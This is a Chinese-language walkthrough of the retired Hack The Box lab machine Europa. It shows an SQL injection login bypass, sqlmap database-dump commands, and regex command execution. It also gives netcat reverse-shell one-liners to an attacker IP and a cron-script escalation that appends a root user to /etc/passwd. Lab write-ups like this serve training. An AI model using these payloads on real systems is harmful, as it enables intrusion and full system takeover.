HTB-靶机-Europa

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.22

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令

autorecon 10.10.10.22 -o ./europa-autorecon

最终的扫描结果

当然还有其他扫描结果，这里就不展示， 总之还针对ssl进行扫描，同样是发现了dns解析域名的信息，根据提示，直接本地绑定hosts信息

echo "10.10.10.22 europacorp.htb" | sudo tee -a /etc/hosts
echo "10.10.10.22 admin-portal.europacorp.htb" | sudo tee -a /etc/hosts
echo "10.10.10.22 www.europacorp.htb" | sudo tee -a /etc/hosts

访问上面的域名有两种页面，一种是默认的apache页面，另一种是登录界面，我们重点看登录界面，这里使用过目标爆破方式进行测试，但没有发现什么有价值的信息

登录窗口是走https，查看下证书，发现下面有价值的信息

确认目标靶机的登录界面用户名邮箱可能是admin@europacorp.htb 尝试使用此邮箱使用默认密码登录，结果失败了，丢一个单引号登录框显示不是邮件格式，于是通过burpsuite抓包的形式进行测试，最终发现存在sql注入，可以通过闭合的方式直接登录到目标靶机后台

POST /login.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://admin-portal.europacorp.htb/login.php
Cookie: PHPSESSID=320d2lci8ai1hbtpbud0iq28b5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

email=admin%40europacorp.htb' or '1' ='1&password=admin%27+or+1

也可以使用sqlmap进行注入，我这里测试了几次时间较长都失败了，根据网上资料显示是可以注入出来账号和密码然后破解进行登录目标

sqlmap -u "https://admin-portal.europacorp.htb/login.php" --data "email=admin@europacorp.htb&password=" --risk=3 --level=3 --dbms "MYSQL" --dump-all --batch
或者
sqlmap -u "https://admin-portal.europacorp.htb/login.php" --data "email=admin@europacorp.htb&password=" --risk=3                                                                                                                         --level=3 --dbms "MYSQL" --dump-all --batch
或者
sqlmap -r sqli-europa-seq --dbms mysql -p email --force-ssl

登录目标成功之后点击了里面的功能点，也就/tools.php可以进行输入，确认可以在此处通过正则表达式的方式进行执行命令，可参考：http://www.madirish.net/402

上述验证确认执行命令没有问题，本地配置反弹shell代码使用python搭建简易web应用下载到目标靶机，使用命令执行此反弹代码获取反弹shell

成功反弹shell获得user.txt 下载LinEnum.sh枚举提权信息的脚本，执行完成之后查看发现目标可以通过计划任务的形式进行提权

进入到计划任务的目录

发现实际执行的是上述目录中的一个shell脚本，我们需要做的就是将提权代码写入此脚本即可等待提权，提权形式如下：

利用计划任务里面执行的脚本进行提权
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 8833 >/tmp/f" > logcleared.sh

echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 10.10.14.4 8833 1>/tmp/p" >logcleared.sh

openssl passwd -1 -salt bmfx bmfx
$1$bmfx$HuKLopGkC8MwDIxBcpRnr/

echo "echo 'bmfx:\$1\$bmfx\$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> /etc/passwd" > logcleared.sh

这里直接使用添加用户的方式提权